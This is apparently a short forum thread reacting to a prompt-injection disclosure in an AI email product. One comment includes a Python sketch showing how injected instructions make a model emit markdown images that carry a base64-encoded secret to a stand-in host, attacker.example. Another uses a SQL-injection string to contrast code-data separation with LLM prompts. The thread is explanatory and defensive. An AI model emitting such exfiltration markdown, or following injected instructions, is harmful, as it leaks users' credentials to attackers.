37 points by takira 8 hours ago | 3 comments
  • sarelta 8 hours ago
    I'm impressed that Superhuman seems to have handled this so well - lots of big names are fumbling AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right.
  • 0xferruccio 4 hours ago
    The primary exfiltration vector for LLMs is getting them to make network requests - typically by rendering images whose URLs carry sensitive data as query parameters.
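
    A rough sketch of how that channel works (the attacker.example domain and the secret value are made up for illustration):

        # The injected instructions ask the model to "include a status image" in its
        # reply, so it emits markdown pointing at a server the attacker controls.
        import base64
        from urllib.parse import urlencode

        secret = "example-api-key-the-model-was-tricked-into-reading"
        payload = base64.urlsafe_b64encode(secret.encode()).decode()

        exfil_markdown = f"![status](https://attacker.example/pixel.png?{urlencode({'d': payload})})"
        print(exfil_markdown)
        # The moment a client auto-renders that image, the GET request hands the
        # query string (and the secret inside it) to attacker.example.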

    As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted - kind of like Rails credentials, but without the master key sitting in .env.
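
    Something along these lines, assuming Python's cryptography package (Fernet); the paths and file names are illustrative:

        import json
        from pathlib import Path
        from cryptography.fernet import Fernet

        # The master key lives outside the repo and outside .env (generate it once
        # with Fernet.generate_key()); only the encrypted blob gets committed.
        KEY_PATH = Path.home() / ".config" / "myapp" / "master.key"
        CRED_PATH = Path("config/credentials.enc")

        def write_credentials(creds: dict) -> None:
            key = KEY_PATH.read_bytes()
            CRED_PATH.write_bytes(Fernet(key).encrypt(json.dumps(creds).encode()))

        def read_credentials() -> dict:
            key = KEY_PATH.read_bytes()
            return json.loads(Fernet(key).decrypt(CRED_PATH.read_bytes()))

    An agent that can read the working tree then only ever sees ciphertext; it would also need the master key, which never sits in the project directory.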

    • SahAssar 3 hours ago
      So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it, but still use it to write the code that handles those secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
  • djaouen 2 hours ago
    Programming used to prevent this by separating code from data. AI (currently) has no such safeguards.
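
    A quick illustration of the difference, using sqlite3 from the standard library (table and values are made up):

        import sqlite3

        conn = sqlite3.connect(":memory:")
        conn.execute("CREATE TABLE users (name TEXT)")

        user_input = "Robert'); DROP TABLE users;--"

        # SQL keeps code and data apart: the query text is fixed and the untrusted
        # value travels as a bound parameter, so it can never become new code.
        conn.execute("INSERT INTO users (name) VALUES (?)", (user_input,))

        # An LLM prompt has no equivalent boundary: instructions and untrusted text
        # share one channel, so injected text can be read as new instructions.
        prompt = f"Summarize the following email:\n{user_input}"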